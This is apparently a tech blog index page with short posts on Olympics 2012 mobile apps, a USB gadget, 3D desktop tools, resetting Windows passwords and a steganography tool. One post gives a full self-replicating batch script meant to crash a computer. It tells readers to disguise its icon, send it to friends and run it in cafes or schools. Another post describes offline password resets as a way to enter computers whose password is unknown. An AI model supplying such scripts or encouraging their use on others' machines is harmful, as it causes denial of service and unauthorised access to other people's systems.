Sign up for FREE daily Updates.

London Olympics 2012 Official Mobile Apps

Leave a Comment Follow me on twitter

With just days left for London Olympics 2012 to kick off in London, the battle for the most popular Olympics Mobile app has already begun.

Official London Olympics 2012 App



There are two free official mobile apps to help users keep in touch with the Games wherever they are. The Join In app is available to download now on Android, iOS and Blackberry. The Results app is available to download now on Android and iOS. It will keep you up to date with all the Olympic sports in the time frame July 25 – August 12th 2012. Paralympic Sports will also be included, taking place from August 29th to September 9th 2012. The app offers live updates, a calendar for all competitions, details on each sports (rules for example), medal tables, profiles for all athletes and details on participating countries. Official news is also included in brief. 
You can download these apps from this page: 


BBC Olympics Mobile App

BBC Olympics App is now available for Android and iPhone. The main function of the app will allow users to receive up to 24 live streams of Olympics coverage over Wi-Fi and 3G signals. Also included will be editorial text from BBC news commentators, dedicated pages for every athlete, country, and sport, schedule information, and a medals chart to allow users to keep track of the winners. Extra functionality allows stories to be saved for offline reading, ensuring the latest information is accessible even when mobile reception is unavailable. Additionally, iOS users can personalize the app by adding their favourite Olympics sports to the customizable tab bar, enabling quick access to the latest live action.The Android app can be downloaded now from the Android App Store. The iOS app can be downloaded from the iTunes App Store. A shortcut app for Blackberry users, which creates a bookmark for the BBC Olympics mobile website, is available from Blackberry App World.


NBC Olympics Mobile App

NBC has teamed up with Adobe to launch two mobile apps that will let people watch Olympics events as they happen, look up athlete profiles, track athletes on Twitter, receive push notifications for breaking news and access other extra content on their iPads, iPhones and certain Android devices. The apps — NBC Olympics and NBC Olympics Live– are free to download. The “Live Extra” app will let you live stream the full 3,500 hours of Olympic content from your mobile device, as well as watch replays — though you’ll need to be a subscriber to a cable or satellite package that includes both CNBC and MSNBC. Those without subscription will get one hour’s worth of viewing time.  
You can download these apps from this page: 

http://www.nbcolympics.com/on-the-go/index.html
◄◄READ MORE►►

U Transfer USB Stick - Transfer Files Without The Need Of A Computer

1 comment Follow me on twitter
U Transfer USB Stick - Transfer Files Without The Need Of A Computer



The biggest problems with USB sticks, which I know many will agree with, is that they are dependent on a computer. If you want to send large files to a friend you have to use a computer to do so. You could use cloud storage systems but not everyone is connected to the internet all the time and 1GB files do take a while to upload.
U Transfer is a new concept where it eliminates the middle man, which is the computer, and enables you to transfer files between USB sticks directly.


It also features a little touchscreen which will enable you to browse around for the file you..


Lets see How it really going to be use in Future.!
◄◄READ MORE►►

Crash Any Computer using Batch File

1 comment Follow me on twitter


 Hiii all, 

 i'm going to explain about batch file virus.but note that this article is education purposes only..don't try to harm your friends computer..!! 
 Hope you will take care of it..!!


so okay lets start.....

but first we have to know :

what is Batch file ?

So batch file is nothing else but a text file which contains
multi-commands of DOS .

while you run this kind of files the dos will run all the commands step by step.

 

Lets Starts:

Now go to start menu and open NOTEPAD.

Now type the first command called @echo off..
by typing this command all the commands will not be displayed on DOS.

After that now add the programs name you wanna open on the file execution time.

I'm typing START NOTEPAD as 5 time and aging START MOZZILA as 8 time.

More repeating command will be make your virus more powerful .

Now save the note pad file as anything .bat , .cmd or .btm

Now send this kind of file to your friend and say him to open this file it will hang his computer in few seconds .

Lets see the Example:




@echo off
:d

start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad

start firefox
start firefox
start firefox
start firefox
start firefox
start firefox
start firefox
start firefox
start firefox
start cricket.bat
start cricket.bat
start cricket.bat
start cricket.bat
start cricket.bat
start cricket.bat
start cricket.bat


goto d
Okay so here is a loop save this file as cricket.bat ..
Change the icon of this file as a different from it's properties settings..

By executing this command will hang your computer mouse and the hole the system and after few seconds the system will be crash !

Don't try this virus at your home use this at cafe or schools,colleges etc..!!

Enjoy.. :)

 
◄◄READ MORE►►

Turn your desktop in 3D

Leave a Comment Follow me on twitter
If you are not keen on the cookie-cutter appearance of your Oprating system or windows, i have covered some great tools for tweaking every last pixel of your desktop.. so it looks and acts just how you want. These are all small things that can be changed to make the desktop experience more desirable, cutom and geared to our own interests..


SphereXP ShphereXP is  world's number one 3-dimensional desktop for windows xp =)



image_2316717.original.jpg (620×465)

YODM 3D- Virtual Desktop Manager featuring the Cube 3D effect, really awesone effect

image_2316718.original.jpg (620×495)

Matodateconvert your desktop in a 3D and make it very impressive !

image_2316719.original.jpg (620×496)

Shock 4Way3D  : Multiwindows and mirror effects 

image_2316720.original.jpg (620×381)

Enjoy :)
◄◄READ MORE►►

How to Hack Windows Administrator Password

Leave a Comment Follow me on twitter
How to Hack Windows Admin Password 
This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So, if you are somewhat in a same kind of situation, here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer.
You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features:
  • You do not need to know the old password to set a new one.
  • This tool can detect and unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence, it is necessary that you boot off your computer and access this sam file via the boot menu. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below:

It is recommended that you download the CD version of the tool since the floppy drive is outdated or doesn’t exist in today’s computer. After the download, you’ll get a bootable image which you need to burn it onto a blank CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords:

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task:
  1. Open the command prompt (Start->Run->type cmd->Enter)
  2. Now type net user and hit Enter
  3. Now the system will show you a list of user accounts on the computer. Say for example, you need to reset the password of the account by name John, then do as follows:
  4. Type net user John * and hit Enter. Now, the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So, in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.
◄◄READ MORE►►

How to Hide Data in Image, Audio & Video Files: Steganography

3 comments Follow me on twitter


How to Hide Data in Images 
Ever wondered to know how to hide secret messages in images, audio and video files? Well, in this post I will take you through a concept called steganography using which, it is possible to hide your secret information in image files, songs or any other file of your choice. At the end of this post, you can also download free stegnographic tools and start hiding your data.

What is Steganography?

Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it. Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected.
The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity.

What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.
Eventhough steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Roumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.

How do Steganography Tools Work?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.
There are many steganography tools available online but only a few are able to work flawlessly. I did not find any tool that worked perfectly on both small and large data. However I have  managed to develop my own tool that can work perfectly on all types of files and all size of data. The tool is called “Stego Magic“. You can download it from the following link.

Download Stego Magic:

                          

The zip file contains two versions of Stego Magic: One for encrypting the text messages and the other for encrypting binary files. StegoMagic_TXT can be used to hide text messages in other files such as an image or a sound file. StegoMagic_BIN can be used to hide one binary file in another such as an executable file inside an image or an image inside a video file.
With Stego Magic, there is no limitation on the size and type of the file that you are intending to hide. For example, you can hide a video of size 1 GB in an image of size 1 MB or hide an executable file inside a WORD document. The tool is pretty straightforward to use and requires no special understanding of the concept.
At the end of the encryption process, a secret decryption key will be generated and the same is required during the decryption process.

How to Use Stego Magic?

Suppose you want to hide a text message inside a JPG file:
1. Place the JPG and the text file (.txt) in the same folder as that of StegoMagic_TXT.exe
2. Run StegoMagic_TXT.exe and follow the screen instructions to embed the text message inside the JPG image.
3. Note down the secret decryption key.
Now you can send this image to your friend via email. To decrypt the hidden message, your friend should load this JPG file onto the Stego Magic tool and use the secret decryption key.
I hope you enjoy this post :)
◄◄READ MORE►►
Premium WordPress Themes